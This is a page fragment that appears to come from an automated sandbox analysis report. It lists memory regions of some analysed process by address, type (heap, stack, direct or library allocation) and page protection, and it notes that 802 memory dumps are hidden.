page read and write
|
||
5C75000
|
heap
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
8A60000
|
trusted library allocation
|
page read and write
|
||
3C9E000
|
direct allocation
|
page execute and read and write
|
||
5FC6000
|
heap
|
page read and write
|
||
35D6000
|
heap
|
page read and write
|
||
3676000
|
heap
|
page read and write
|
||
88B5000
|
heap
|
page read and write
|
||
6956000
|
heap
|
page read and write
|
||
3668000
|
heap
|
page read and write
|
||
4001000
|
heap
|
page read and write
|
||
873E000
|
stack
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
500A000
|
stack
|
page read and write
|
||
B6E000
|
unkown
|
page write copy
|
||
6075000
|
heap
|
page read and write
|
||
8670000
|
trusted library allocation
|
page execute and read and write
|
||
94B000
|
heap
|
page read and write
|
||
51A0000
|
direct allocation
|
page read and write
|
||
73DF000
|
stack
|
page read and write
|
||
3202000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
6778000
|
trusted library allocation
|
page read and write
|
||
87B0000
|
trusted library allocation
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
679B000
|
trusted library allocation
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
7952000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
6927000
|
heap
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
8850000
|
heap
|
page read and write
|
||
6962000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
6740000
|
trusted library allocation
|
page read and write
|
||
118B000
|
heap
|
page read and write
|
||
5241000
|
heap
|
page read and write
|
||
2FF8000
|
heap
|
page read and write
|
||
78EA000
|
heap
|
page read and write
|
||
71BE000
|
stack
|
page read and write
|
||
4FF8000
|
trusted library allocation
|
page read and write
|
||
33F7000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
637F000
|
heap
|
page read and write
|
||
2E34000
|
heap
|
page read and write
|
||
7C70000
|
trusted library allocation
|
page read and write
|
||
94D000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5F58000
|
heap
|
page read and write
|
||
6928000
|
heap
|
page read and write
|
||
876B000
|
trusted library allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
67B9000
|
trusted library allocation
|
page read and write
|
||
755F000
|
stack
|
page read and write
|
||
32ED000
|
trusted library allocation
|
page execute and read and write
|
||
32A000
|
stack
|
page read and write
|
||
5256000
|
heap
|
page read and write
|
||
47C4000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
1870000
|
heap
|
page read and write
|
||
930000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
AB1000
|
unkown
|
page execute read
|
||
50FE000
|
stack
|
page read and write
|
||
6040000
|
heap
|
page read and write
|
||
8767000
|
trusted library allocation
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
FBA000
|
heap
|
page read and write
|
||
5FB0000
|
heap
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
5EB4000
|
heap
|
page read and write
|
||
698B000
|
heap
|
page read and write
|
||
7F3C8000
|
trusted library allocation
|
page execute and read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
6970000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
5FA5000
|
heap
|
page read and write
|
||
840E000
|
direct allocation
|
page read and write
|
||
3405000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
5EEC000
|
heap
|
page read and write
|
||
924000
|
heap
|
page read and write
|
||
5FDF000
|
heap
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
3E42000
|
direct allocation
|
page execute and read and write
|
||
697A000
|
heap
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
52A3000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
608A000
|
heap
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
5470000
|
trusted library allocation
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
6180000
|
trusted library allocation
|
page read and write
|
||
2B6E000
|
stack
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
8BD0000
|
trusted library allocation
|
page read and write
|
||
938000
|
heap
|
page read and write
|
||
5FBB000
|
heap
|
page read and write
|
||
7930000
|
trusted library allocation
|
page execute and read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
4AE0000
|
heap
|
page read and write
|
||
3900000
|
heap
|
page read and write
|
||
B3F000
|
unkown
|
page readonly
|
||
699F000
|
heap
|
page read and write
|
||
69A4000
|
heap
|
page read and write
|
||
60DC000
|
trusted library allocation
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
2F5C000
|
stack
|
page read and write
|
||
6920000
|
heap
|
page read and write
|
||
731D000
|
stack
|
page read and write
|
||
6933000
|
heap
|
page read and write
|
||
5F92000
|
heap
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
A3E000
|
stack
|
page read and write
|
||
5FBB000
|
heap
|
page read and write
|
||
6957000
|
heap
|
page read and write
|
||
93B000
|
heap
|
page read and write
|
||
6926000
|
heap
|
page read and write
|
||
5FBB000
|
heap
|
page read and write
|
||
6933000
|
heap
|
page read and write
|
||
B3F000
|
unkown
|
page readonly
|
||
F70000
|
heap
|
page read and write
|
||
514D000
|
stack
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
7BCD000
|
stack
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
92C000
|
heap
|
page read and write
|
||
7910000
|
heap
|
page execute and read and write
|
||
6971000
|
heap
|
page read and write
|
||
5FBD000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
5FBB000
|
heap
|
page read and write
|
||
6991000
|
heap
|
page read and write
|
||
5F71000
|
heap
|
page read and write
|
||
F6B000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page read and write
|
||
5268000
|
heap
|
page read and write
|
||
78F6000
|
heap
|
page read and write
|
||
939000
|
heap
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
9FC000
|
stack
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
5269000
|
heap
|
page read and write
|
||
F63000
|
heap
|
page read and write
|
||
69A1000
|
heap
|
page read and write
|
||
6969000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
925000
|
heap
|
page read and write
|
||
6085000
|
heap
|
page read and write
|
||
6933000
|
heap
|
page read and write
|
||
937000
|
heap
|
page read and write
|
||
32E3000
|
trusted library allocation
|
page execute and read and write
|
||
6267000
|
trusted library allocation
|
page read and write
|
||
5F52000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
536E000
|
stack
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
3C29000
|
direct allocation
|
page execute and read and write
|
||
949000
|
heap
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
774E000
|
stack
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
50BE000
|
stack
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
547A000
|
trusted library allocation
|
page read and write
|
||
60E1000
|
trusted library allocation
|
page read and write
|
||
1438000
|
heap
|
page read and write
|
||
911C000
|
stack
|
page read and write
|
||
6035000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
33E0000
|
trusted library allocation
|
page execute and read and write
|
||
6035000
|
heap
|
page read and write
|
||
8C5E000
|
stack
|
page read and write
|
||
8840000
|
heap
|
page read and write
|
||
7140000
|
direct allocation
|
page read and write
|
||
5FAB000
|
heap
|
page read and write
|
||
546F000
|
stack
|
page read and write
|
||
741E000
|
stack
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
6962000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
5F5A000
|
heap
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
142E000
|
stack
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
8923000
|
heap
|
page read and write
|
||
185F000
|
stack
|
page read and write
|
||
3A29000
|
heap
|
page read and write
|
||
88CB000
|
heap
|
page read and write
|
||
5C70000
|
heap
|
page read and write
|
||
5FA8000
|
heap
|
page read and write
|
||
35AA000
|
heap
|
page read and write
|
||
39B0000
|
direct allocation
|
page read and write
|
||
1EEE000
|
stack
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
5250000
|
heap
|
page read and write
|
||
1027000
|
heap
|
page read and write
|
||
6FA0000
|
direct allocation
|
page read and write
|
||
69C8000
|
heap
|
page read and write
|
||
6770000
|
trusted library allocation
|
page read and write
|
||
5070000
|
heap
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
5125000
|
trusted library allocation
|
page read and write
|
||
5247000
|
heap
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
7160000
|
direct allocation
|
page read and write
|
||
8E4C000
|
stack
|
page read and write
|
||
86FE000
|
stack
|
page read and write
|
||
D4C000
|
stack
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
8DEE000
|
stack
|
page read and write
|
||
127D000
|
stack
|
page read and write
|
||
5FD5000
|
heap
|
page read and write
|
||
8E8000
|
heap
|
page read and write
|
||
619B000
|
trusted library allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
B77000
|
unkown
|
page readonly
|
||
7A8E000
|
stack
|
page read and write
|
||
7A40000
|
heap
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
2E26000
|
heap
|
page read and write
|
||
D64000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
87A0000
|
trusted library allocation
|
page read and write
|
||
35E0000
|
heap
|
page read and write
|
||
737000
|
stack
|
page read and write
|
||
7B8E000
|
stack
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
677A000
|
trusted library allocation
|
page read and write
|
||
1820000
|
direct allocation
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
919000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
698C000
|
heap
|
page read and write
|
||
696F000
|
heap
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
5E76000
|
heap
|
page read and write
|
||
6530000
|
trusted library allocation
|
page read and write
|
||
5FE2000
|
heap
|
page read and write
|
||
608B000
|
heap
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
5FAB000
|
heap
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
5FB2000
|
heap
|
page read and write
|
||
995000
|
heap
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
74DD000
|
stack
|
page read and write
|
||
2E66000
|
heap
|
page read and write
|
||
5E7D000
|
heap
|
page read and write
|
||
608E000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
692A000
|
heap
|
page read and write
|
||
E8E000
|
stack
|
page read and write
|
||
7B4F000
|
stack
|
page read and write
|
||
528E000
|
heap
|
page read and write
|
||
7B0E000
|
stack
|
page read and write
|
||
3B00000
|
direct allocation
|
page execute and read and write
|
||
523F000
|
heap
|
page read and write
|
||
8DAE000
|
stack
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
529B000
|
heap
|
page read and write
|
||
60D3000
|
trusted library allocation
|
page read and write
|
||
47C0000
|
heap
|
page read and write
|
||
5210000
|
heap
|
page read and write
|
||
925000
|
heap
|
page read and write
|
||
5248000
|
heap
|
page read and write
|
||
5E74000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
995000
|
heap
|
page read and write
|
||
9BE000
|
stack
|
page read and write
|
||
6969000
|
heap
|
page read and write
|
||
6F92000
|
direct allocation
|
page read and write
|
||
F70000
|
heap
|
page read and write
|
||
6610000
|
trusted library allocation
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
7801000
|
heap
|
page read and write
|
||
175F000
|
stack
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
976000
|
heap
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
6041000
|
heap
|
page read and write
|
||
526A000
|
heap
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
3380000
|
heap
|
page readonly
|
||
137C000
|
stack
|
page read and write
|
||
60DE000
|
trusted library allocation
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
394F000
|
stack
|
page read and write
|
||
5218000
|
trusted library allocation
|
page read and write
|
||
751E000
|
stack
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
6939000
|
heap
|
page read and write
|
||
3A2D000
|
heap
|
page read and write
|
||
39B0000
|
direct allocation
|
page read and write
|
||
47CF000
|
heap
|
page read and write
|
||
6969000
|
heap
|
page read and write
|
||
692E000
|
heap
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
6983000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
6300000
|
trusted library allocation
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
3823000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
6256000
|
trusted library allocation
|
page read and write
|
||
8958000
|
heap
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
39A0000
|
direct allocation
|
page read and write
|
There are 802 hidden memdumps, click here to show them.